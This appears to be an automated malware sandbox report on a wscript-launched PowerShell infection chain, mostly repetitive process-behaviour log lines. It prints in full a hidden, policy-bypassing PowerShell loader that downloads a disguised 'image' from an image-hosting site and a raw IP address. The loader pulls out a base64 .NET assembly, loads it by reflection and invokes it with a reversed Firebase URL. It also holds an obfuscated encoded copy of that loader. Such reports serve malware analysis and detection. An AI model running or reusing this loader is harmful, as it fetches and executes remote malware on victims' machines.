uDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('a3a0a1c32178-901a-6114-0473-4892713e=nekot&aidem=tla?txt.402031mrowxnhoj/o/moc.topsppa.64038-metsys-eciovni/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'Name','AddInProcess32',''))} }	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FF848F000BD pushad ; iretd

2_2_00007FF848F000C1

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1158	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1624	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3193	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5713	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 6548	Thread sleep time: -30000s >= -30000s	Jump to behavior
